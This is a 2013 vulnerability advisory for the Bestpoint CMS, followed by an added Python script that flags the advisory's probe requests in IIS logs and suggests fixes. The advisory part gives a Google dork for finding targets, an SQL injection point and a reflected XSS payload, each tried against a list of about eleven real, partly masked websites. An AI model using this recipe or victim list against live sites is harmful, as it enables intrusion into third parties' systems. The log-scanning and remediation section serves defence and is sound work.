Bestpoint Multiple Vulnerabilities
Posted on 06 September 2013
#********************************************************************************
# Exploit Title : Bestpoint Multiple Vulnerabilities
#
# Software link : http://www.bestpoint.nl
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by Bestpoint"
#
# Date: 2013/09/06
#
# --------------------------------------------------------------------
# Exploit 1 : Sql Injection
#
# Location : [Target]/Default.asp/id,1[Sql Injection]
#
# Proof:
#
# http://www.altaXXleski.nl/Default.asp/id,1'
# http://www.avXXc.nl/Default.asp/id,1'
# http://www.chXXXo.nl/Default.asp/id,1'
# http://www.jaXXXland.com/Default.asp/id,1'
# http://www.cloudbXXXpvault.net/Default.asp/id,1'
# http://www.icecXXXugs.com/Default.asp/id,1'
# http://www.sXXXXo.nl/Default.asp/id,1'
# http://www.vaXXXofsport.nl/Default.asp/id,1'
# http://www.sporXijzen.com/Default.asp/id,1'
# http://www.pneuXXix.com/Default.asp/id,1'
# http://www.wakeboXXXrdworld.eu/Default.asp/id,1'
#
# --------------------------------------------------------------------
# Exploit 2 : Cross site scripting
#
# Location : [Target]/linkout.asp?to=[xss]
#
# Proof:
#
# http://www.altaXXableski.nl/linkout.asp?to=<script>alert(1);</script>
# http://www.avXXXXc.nl/linkout.asp?to=<script>alert(1);</script>
# http://www.chrXXX.nl/linkout.asp?to=<script>alert(1);</script>
# http://www.jannXXXland.com/linkout.asp?to=<script>alert(1);</script>
# http://www.cloudbacXXvault.net/linkout.asp?to=<script>alert(1);</script>
# http://www.icecreammXXs.com/linkout.asp?to=<script>alert(1);</script>
# http://www.seXuro.nl/linkout.asp?to=<script>alert(1);</script>
# http://www.vanXXfsport.nl/linkout.asp?to=<script>alert(1);</script>
# http://www.sporXXprijzen.com/linkout.asp?to=<script>alert(1);</script>
# http://www.pneXXix.com/linkout.asp?to=<script>alert(1);</script>
# http://www.wakXXoardworld.eu/linkout.asp?to=<script>alert(1);</script>
#
###################### discovered by : ACC3SS ######################
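
For site operators: a log check for the two request shapes listed above, written as an added example (not part of the original advisory). It assumes IIS W3C-format logs with a #Fields: header; the sample lines, field layout and finding names are constructed for illustration, and the matching is a heuristic.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C-format sample (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-09-06 10:00:01 GET /Default.asp/id,1 - 192.0.2.10 200
2013-09-06 10:00:05 GET /Default.asp/id,1' - 198.51.100.7 500
2013-09-06 10:00:09 GET /linkout.asp to=http://example.org/ 192.0.2.10 302
2013-09-06 10:00:12 GET /linkout.asp to=%3Cscript%3Ealert(1)%3B%3C/script%3E 198.51.100.7 200
"""

# Path-style parameter from the advisory: /Default.asp/id,<value>
ID_PATH = re.compile(r"/default\.asp/id,([^/]*)", re.IGNORECASE)
# Characters that have no place in a plain redirect target
MARKUP = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

def classify(stem, query):
    """Return findings for one request (URI stem and raw query string)."""
    findings = []
    path = unquote(stem)
    m = ID_PATH.search(path)
    if m and not re.fullmatch(r"[0-9]+", m.group(1)):
        findings.append("sqli-probe")      # id is expected to be an integer
    if path.lower().endswith("/linkout.asp"):
        for value in parse_qs(query, keep_blank_values=True).get("to", []):
            if MARKUP.search(value):
                findings.append("xss-probe")  # markup where a URL is expected
    return findings

def scan(log_text):
    """Yield (client_ip, uri_stem, findings) for each flagged W3C log line."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column names for following rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        findings = classify(row.get("cs-uri-stem", ""), "" if query == "-" else query)
        if findings:
            yield row.get("c-ip", "?"), row["cs-uri-stem"], findings

if __name__ == "__main__":
    for ip, uri, findings in scan(SAMPLE_LOG):
        print(ip, uri, ",".join(findings))
```

Hits from this check only show that the endpoints were probed; the fix belongs in the application, by treating id as an integer in a parameterized query and HTML-encoding the to value before it is written to the page.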
